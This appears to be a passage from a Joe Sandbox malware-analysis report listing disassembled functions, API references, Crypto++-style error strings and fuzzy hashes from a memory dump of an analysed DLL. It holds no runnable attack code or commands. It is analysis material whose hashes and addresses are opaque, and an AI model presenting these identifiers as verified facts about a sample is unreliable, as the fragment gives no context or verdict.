                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Xinvalid_argumentstd::_$_memmove
                                                          • String ID: string too long
                                                          • API String ID: 2168136238-2556327735
                                                          • Opcode ID: 95f39db1d6f947b4ed8ade9dced14b472297454229b0848cc2928f59a4094e83
                                                          • Instruction ID: a67e41783e292cb69c7e60e6527b11026a3d54ac4eabb91007b57fc4bf11727a
                                                          • Opcode Fuzzy Hash: 95f39db1d6f947b4ed8ade9dced14b472297454229b0848cc2928f59a4094e83
                                                          • Instruction Fuzzy Hash: 5831E9323106105BD3259E5DE8809AEFBE9EFF17247A0892FE655CBE40C772987483A1
                                                          Function 6CF52090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CF54010: std::_Xinvalid_argument.LIBCPMT ref: 6CF5402A
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF5211F
                                                            • Part of subcall function 6CFBAC75: RaiseException.KERNEL32(?,?,6CFB9C34,CA0C7769,?,?,?,?,6CFB9C34,CA0C7769,6CFE9C90,6CFFB974,CA0C7769), ref: 6CFBACB7
                                                            • Part of subcall function 6CF54010: std::_Xinvalid_argument.LIBCPMT ref: 6CF54067
                                                            • Part of subcall function 6CF54010: _memmove.LIBCMT ref: 6CF540C8
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF521BF
                                                          Strings
                                                          • PK_MessageAccumulator: DigestSize() should not be called, xrefs: 6CF520BD
                                                          • PK_MessageAccumulator: TruncatedFinal() should not be called, xrefs: 6CF5215D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
                                                          • String ID: PK_MessageAccumulator: DigestSize() should not be called$PK_MessageAccumulator: TruncatedFinal() should not be called
                                                          • API String ID: 1902190269-1268710280
                                                          • Opcode ID: f3cfee293ce366abbf1b7eb1124f2c6fac4195cfd1aa3f367cb8a9ad39e94288
                                                          • Instruction ID: 7f8ef5cb3325d0e8a4f2587e6e8831cc9a6c9286a2ff14127f4ad0baba34775b
                                                          • Opcode Fuzzy Hash: f3cfee293ce366abbf1b7eb1124f2c6fac4195cfd1aa3f367cb8a9ad39e94288
                                                          • Instruction Fuzzy Hash: 31413CB0C0428CEFDB11DFE9D880ADDFFB8AB19314F548659E421A7B90DB756A08CB50
                                                          Function 6CF51D30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 113COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CF54010: std::_Xinvalid_argument.LIBCPMT ref: 6CF5402A
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF51DC9
                                                            • Part of subcall function 6CFBAC75: RaiseException.KERNEL32(?,?,6CFB9C34,CA0C7769,?,?,?,?,6CFB9C34,CA0C7769,6CFE9C90,6CFFB974,CA0C7769), ref: 6CFBACB7
                                                            • Part of subcall function 6CF54010: std::_Xinvalid_argument.LIBCPMT ref: 6CF54067
                                                            • Part of subcall function 6CF54010: _memmove.LIBCMT ref: 6CF540C8
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF51E74
                                                          Strings
                                                          • CryptoMaterial: this object contains invalid values, xrefs: 6CF51E16
                                                          • BufferedTransformation: this object is not attachable, xrefs: 6CF51D67
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
                                                          • String ID: BufferedTransformation: this object is not attachable$CryptoMaterial: this object contains invalid values
                                                          • API String ID: 1902190269-3853263434
                                                          • Opcode ID: 6f6a0035356704ebe809cceaf3ea1c446502d4ad96bb9eb92850cae4fffef843
                                                          • Instruction ID: 008e532c322550828424186aa1c96c132574f89184b25eefc24d3febe6c04901
                                                          • Opcode Fuzzy Hash: 6f6a0035356704ebe809cceaf3ea1c446502d4ad96bb9eb92850cae4fffef843
                                                          • Instruction Fuzzy Hash: 68412EB1C04248AFCB14DFE9D880BDEFBB8EB19314F548659E42567750DB756A08CB50
                                                          Function 6CF874C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CFAD820: _memmove.LIBCMT ref: 6CFAD930
                                                            • Part of subcall function 6CF54010: std::_Xinvalid_argument.LIBCPMT ref: 6CF5402A
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF8761A
                                                            • Part of subcall function 6CFBAC75: RaiseException.KERNEL32(?,?,6CFB9C34,CA0C7769,?,?,?,?,6CFB9C34,CA0C7769,6CFE9C90,6CFFB974,CA0C7769), ref: 6CFBACB7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ExceptionException@8RaiseThrowXinvalid_argument_memmovestd::_
                                                          • String ID: byte digest to $ bytes$HashTransformation: can't truncate a
                                                          • API String ID: 39012651-1139078987
                                                          • Opcode ID: ea7250bab6fd36ef2c8bf0b1ddeed84bfd792ac42ac7a2b2ab0805c60237f767
                                                          • Instruction ID: e9c379d28d7075b9b460b2d5d274df4a3bbc56b0f91857d52c91a9bf8601f7c1
                                                          • Opcode Fuzzy Hash: ea7250bab6fd36ef2c8bf0b1ddeed84bfd792ac42ac7a2b2ab0805c60237f767
                                                          • Instruction Fuzzy Hash: E54182711083C0AFD334CB64C844FDBBBE8AB99314F144A1DF69997780EB75A5088BA7
                                                          Function 6CF8BEF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6CF8BF2D
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB90ED
                                                            • Part of subcall function 6CFB90D8: __CxxThrowException@8.LIBCMT ref: 6CFB9102
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB9113
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                          • String ID: gfff$gfff$vector<T> too long
                                                          • API String ID: 1823113695-3369487235
                                                          • Opcode ID: 8ff9db9ee66822eb121a843c66370f9d1622f51562b7e5750cbd7b0962f6ebe5
                                                          • Instruction ID: f16935d27f52d717b65b2c0d2d03c127d0f8d6872b5450c8eae340447e5eed81
                                                          • Opcode Fuzzy Hash: 8ff9db9ee66822eb121a843c66370f9d1622f51562b7e5750cbd7b0962f6ebe5
                                                          • Instruction Fuzzy Hash: 5D31B6B1A046099FC718CF59DC80E6AF7B9EB48304F148A2DE9599B780DB31B9048B91
                                                          Function 6CFB8E40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • QueryPerformanceFrequency.KERNEL32(CA0C7769,CA0C7769), ref: 6CFB8E7F
                                                          • GetLastError.KERNEL32(0000000A), ref: 6CFB8E8F
                                                            • Part of subcall function 6CF54010: std::_Xinvalid_argument.LIBCPMT ref: 6CF5402A
                                                          • __CxxThrowException@8.LIBCMT ref: 6CFB8F14
                                                            • Part of subcall function 6CFBAC75: RaiseException.KERNEL32(?,?,6CFB9C34,CA0C7769,?,?,?,?,6CFB9C34,CA0C7769,6CFE9C90,6CFFB974,CA0C7769), ref: 6CFBACB7
                                                          Strings
                                                          • Timer: QueryPerformanceFrequency failed with error , xrefs: 6CFB8EA5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ErrorExceptionException@8FrequencyLastPerformanceQueryRaiseThrowXinvalid_argumentstd::_
                                                          • String ID: Timer: QueryPerformanceFrequency failed with error
                                                          • API String ID: 2175244869-348333943
                                                          • Opcode ID: 8dfca13be84f6da8ed0f8d6ab8b4742e9e4c03a089de0e445cfb47b1f465abd8
                                                          • Instruction ID: c5876da6345d5c5e7a11b3005f477acef5712668e0ffaac68d89d283996ae473
                                                          • Opcode Fuzzy Hash: 8dfca13be84f6da8ed0f8d6ab8b4742e9e4c03a089de0e445cfb47b1f465abd8
                                                          • Instruction Fuzzy Hash: 4F213DB15083809FD310DF24C840B9BBBE8FB89614F504A1DF5A992641DB7595088BA3
                                                          Function 6CFB8F40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • QueryPerformanceCounter.KERNEL32(CA0C7769,CA0C7769,?,00000000), ref: 6CFB8F7F
                                                          • GetLastError.KERNEL32(0000000A,?,00000000), ref: 6CFB8F8F
                                                            • Part of subcall function 6CF54010: std::_Xinvalid_argument.LIBCPMT ref: 6CF5402A
                                                          • __CxxThrowException@8.LIBCMT ref: 6CFB9014
                                                            • Part of subcall function 6CFBAC75: RaiseException.KERNEL32(?,?,6CFB9C34,CA0C7769,?,?,?,?,6CFB9C34,CA0C7769,6CFE9C90,6CFFB974,CA0C7769), ref: 6CFBACB7
                                                          Strings
                                                          • Timer: QueryPerformanceCounter failed with error , xrefs: 6CFB8FA5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: CounterErrorExceptionException@8LastPerformanceQueryRaiseThrowXinvalid_argumentstd::_
                                                          • String ID: Timer: QueryPerformanceCounter failed with error
                                                          • API String ID: 1823523280-4075696077
                                                          • Opcode ID: e8354bc74958f57c8ea2ea6e0d067d95c0b961b71bb1321ef7748afc216310c5
                                                          • Instruction ID: 0de18a7834938b04325ab3eee92313d19c22de1bb553570a32e433fd15e773f3
                                                          • Opcode Fuzzy Hash: e8354bc74958f57c8ea2ea6e0d067d95c0b961b71bb1321ef7748afc216310c5
                                                          • Instruction Fuzzy Hash: CD214FB1508380AFD310CF24C880B9BBBF8FB89614F504E1DF5A593781DB7595088BA3
                                                          Function 6CF86480 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF86518
                                                            • Part of subcall function 6CFBAC75: RaiseException.KERNEL32(?,?,6CFB9C34,CA0C7769,?,?,?,?,6CFB9C34,CA0C7769,6CFE9C90,6CFFB974,CA0C7769), ref: 6CFBACB7
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF86558
                                                          Strings
                                                          • Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 6CF86527
                                                          • Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 6CF864E7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                          • String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
                                                          • API String ID: 3476068407-3345525433
                                                          • Opcode ID: 129770a32d80f47e4b549de9f1a6652693c06fe6e3acea2ebb48b315b037a5c5
                                                          • Instruction ID: 50d9d7f69710fff62be78fb0bcb2c03b2d2b43ac9f85e165c77fd482e8442b3b
                                                          • Opcode Fuzzy Hash: 129770a32d80f47e4b549de9f1a6652693c06fe6e3acea2ebb48b315b037a5c5
                                                          • Instruction Fuzzy Hash: 0A21C3715283809FC724DF64C844FDBB3F8AB49608F404A1DF69592A84EF76E4088A63
                                                          Function 6CF8C120 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6CF8C14E
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB90ED
                                                            • Part of subcall function 6CFB90D8: __CxxThrowException@8.LIBCMT ref: 6CFB9102
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB9113
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                          • String ID: gfff$gfff$vector<T> too long
                                                          • API String ID: 1823113695-3369487235
                                                          • Opcode ID: 5e7c2b702bf7d0545ab458430f90714736b363a5da14070f5d4496a174bf85ec
                                                          • Instruction ID: 5dfdc350d324584dc1270aec15cccb0b57897ed493805e2e3a28bfe53dd51e92
                                                          • Opcode Fuzzy Hash: 5e7c2b702bf7d0545ab458430f90714736b363a5da14070f5d4496a174bf85ec
                                                          • Instruction Fuzzy Hash: FC01D673F050251F8310993FFD4444AE6A79BD4395319CB36D608DB758D531DC0253D2
                                                          Function 6CF925D0 Relevance: 6.2, APIs: 4, Instructions: 206COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: _memmove$Exception@8Throw
                                                          • String ID:
                                                          • API String ID: 2655171816-0
                                                          • Opcode ID: f84c7b2a3aa3cd67c376f9e5557dd4008eb03a9ea2cd85e982e8cb277d0efd71
                                                          • Instruction ID: 28fd07abe87dc781cb811ed3a2aba130eb4db5f4f18b59d42ea5f05734827d9f
                                                          • Opcode Fuzzy Hash: f84c7b2a3aa3cd67c376f9e5557dd4008eb03a9ea2cd85e982e8cb277d0efd71
                                                          • Instruction Fuzzy Hash: BC51B0753047069FEB04DF69D984A2FB3E9AFC8604F10492DE495D3B40EB36ED098B92
                                                          Function 6CF6D4B0 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CFB9BB5: _malloc.LIBCMT ref: 6CFB9BCF
                                                          • std::exception::exception.LIBCMT ref: 6CF6D5E4
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF6D5F9
                                                          • std::exception::exception.LIBCMT ref: 6CF6D608
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF6D61D
                                                            • Part of subcall function 6CFB9BB5: std::exception::exception.LIBCMT ref: 6CFB9C04
                                                            • Part of subcall function 6CFB9BB5: std::exception::exception.LIBCMT ref: 6CFB9C1E
                                                            • Part of subcall function 6CFB9BB5: __CxxThrowException@8.LIBCMT ref: 6CFB9C2F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                          • String ID:
                                                          • API String ID: 2621100827-0
                                                          • Opcode ID: 4e182ffe891e8e07bec46b716025b88523d964c2ac7b0187ace18e7270cb7b0a
                                                          • Instruction ID: 8e24ef9d039609661a34972f1a68e0100c6ee9110e33be5c5573722a7fdced7f
                                                          • Opcode Fuzzy Hash: 4e182ffe891e8e07bec46b716025b88523d964c2ac7b0187ace18e7270cb7b0a
                                                          • Instruction Fuzzy Hash: F35149B1A00649AFC704DFA9C980A89BBF4FF08304F54866EE419D7F40D771EA14CBA1
                                                          Function 6CF75F00 Relevance: 6.1, APIs: 4, Instructions: 135COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CFB9BB5: _malloc.LIBCMT ref: 6CFB9BCF
                                                          • std::exception::exception.LIBCMT ref: 6CF76035
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF7604A
                                                          • std::exception::exception.LIBCMT ref: 6CF76059
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF7606E
                                                            • Part of subcall function 6CFB9BB5: std::exception::exception.LIBCMT ref: 6CFB9C04
                                                            • Part of subcall function 6CFB9BB5: std::exception::exception.LIBCMT ref: 6CFB9C1E
                                                            • Part of subcall function 6CFB9BB5: __CxxThrowException@8.LIBCMT ref: 6CFB9C2F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
